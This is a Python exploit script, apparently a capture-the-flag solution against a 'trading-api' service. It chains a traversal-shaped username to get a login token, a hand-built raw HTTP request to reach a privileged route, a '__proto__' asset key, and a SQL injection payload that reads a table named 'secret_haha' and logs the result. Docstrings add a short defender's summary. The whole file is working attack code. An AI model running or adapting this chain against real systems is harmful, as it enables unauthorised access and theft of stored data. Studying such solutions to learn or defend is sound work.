@hatunaa
Created December 7, 2022 12:29
#!/usr/bin/env python3
import argparse
import requests
import json
from urllib.parse import quote
from pwn import remote, log
def authn_bypass(base, additional_data=''):
    """Obtain a token from the login route using a traversal-shaped username.

    POSTs to ``{base}/api/auth/login`` with a username of the form
    ``../../health?{additional_data}`` and a fixed dummy password, then
    returns the ``token`` field of the JSON response.  Why the service issues
    a token for that username is not visible here; the shape of the value
    suggests the login handler forwards the username into a URL or path
    without validating it (NOTE(review): confirm against the server code).

    Args:
        base: Scheme and authority of the service, e.g. ``http://host:port``.
        additional_data: Text appended after ``?`` in the crafted username.

    Returns:
        The ``token`` string from the login response.

    Raises:
        KeyError: If the response JSON has no ``token`` field.
        json.JSONDecodeError: If the response body is not JSON.
    """
    credentials = {
        'username': f'../../health?{additional_data}',
        'password': 'x',
    }
    response = requests.post(f'{base}/api/auth/login', json=credentials)
    parsed = json.loads(response.text)
    return parsed['token']
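def request_bypass_authz(host, port, method, path, token, body=''):
    """Send one hand-built HTTP/1.1 request over a raw socket and return the body.

    The request is assembled as text and written directly to a pwntools
    ``remote`` tube instead of going through ``requests``, so ``path`` goes on
    the wire verbatim; the caller in this script passes an absolute-form
    request-target (``http://.../api/priv/...``) plus the forged
    ``authorization`` header.  How the server's routing or authorization layer
    treats that request-target is not visible from this function — it only
    sends and reads.

    Args:
        host: Target host name (also used for the ``host`` header).
        port: Target TCP port.
        method: HTTP method token, e.g. ``'PUT'``.
        path: Request-target placed verbatim after the method.
        token: Value of the ``authorization`` header.
        body: Request body; ``content-length`` is ``len(body)``.

    Returns:
        The response text after the first blank line, i.e. headers stripped.

    Raises:
        IndexError: If the response contains no ``\\r\\n\\r\\n`` separator.
    """
    # NOTE: len() counts characters, not bytes; the only caller in this file
    # uses the default empty body, so the two agree here.
    head = (
        f'{method} {path} HTTP/1.1\r\n'
        f'host: {host}\r\n'
        'connection: close\r\n'
        f'authorization: {token}\r\n'
        f'content-length: {len(body)}\r\n'
        '\r\n'
    )
    conn = remote(host, port, level='error')
    try:
        conn.send((head + body).encode('utf-8'))
        raw = conn.recvall().decode('utf-8')
    finally:
        # Fix: the original never closed the tube, leaking the socket on
        # every call and on any recvall()/decode() failure.
        conn.close()
    return raw.split('\r\n\r\n')[1]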
def create_tx(host, port, token, asset, action):
    """Create a transaction via the privileged assets route and return its id.

    Issues ``PUT http://tuandv.com/api/priv/assets/{asset}/{action}`` through
    :func:`request_bypass_authz`, percent-encoding both segments with
    :func:`urllib.parse.quote`, and returns the ``id`` field of the JSON body.
    The ``tuandv.com`` authority is hard-coded in the script; the TCP
    connection itself still goes to ``host``:``port``.

    Raises:
        KeyError: If the response JSON has no ``id`` field.
        json.JSONDecodeError: If the response body is not JSON.
    """
    target = f'http://tuandv.com/api/priv/assets/{quote(asset)}/{quote(action)}'
    reply = request_bypass_authz(host, port, 'PUT', target, token)
    return json.loads(reply)['id']
def get_tx(host, port, token, tx_id):
    """Fetch one transaction by id, sending ``token`` in ``authorization``.

    Returns the parsed JSON body of ``GET /api/transactions/{tx_id}``;
    ``tx_id`` is stringified and percent-encoded before being placed in the URL.

    Raises:
        json.JSONDecodeError: If the response body is not JSON.
    """
    url = f'http://{host}:{port}/api/transactions/{quote(str(tx_id))}'
    headers = {'authorization': token}
    response = requests.get(url, headers=headers)
    return json.loads(response.text)
def exploit(host, port):
    """Run the full chain against ``host``:``port`` and log the recovered value.

    As written in the script: (1) obtain a token from the login route with
    ``::txId`` appended to the crafted username; (2) create a transaction
    whose asset is ``__proto__`` and whose action is a quote-breaking SQL
    fragment reading ``secret_haha``; (3) read the transaction back and log
    ``username[13:]``.  The offset 13 is not explained in the source —
    presumably it skips a fixed prefix the server stores in front of the
    username; confirm against a real response.

    Defender's reading of the same steps: the chain appears to rely on the
    username being used to build a URL/path unvalidated, on a caller-chosen
    key being accepted as an object property, and on a value being
    concatenated into SQL.  Input validation and parameterised queries close
    those links; each is inferred from the payloads, not shown here.
    """
    log.info('Creating JWT')
    base = f'http://{host}:{port}'
    jwt = authn_bypass(base, additional_data='::txId')
    log.info(f'Token: {jwt}')

    asset = '__proto__'
    action = "'||(select secret_haha from secret_haha)||'"
    new_tx = create_tx(host, port, jwt, asset, action)
    log.info(f'Created transaction: {new_tx}')

    record = get_tx(host, port, jwt, new_tx)
    log.info(f'Transaction: {record}')
    secret = record['username'][13:]
    log.success(f'Secret in database: {secret}')
def main():
    """Parse ``host`` and ``port`` from the command line and call :func:`exploit`."""
    cli = argparse.ArgumentParser(description='trading-api exploit')
    cli.add_argument('host', help='Host name')
    cli.add_argument('port', help='Port', type=int)
    opts = cli.parse_args()
    exploit(opts.host, opts.port)
# Only run the CLI entry point when executed as a script, not on import.
if __name__ == "__main__":
    main()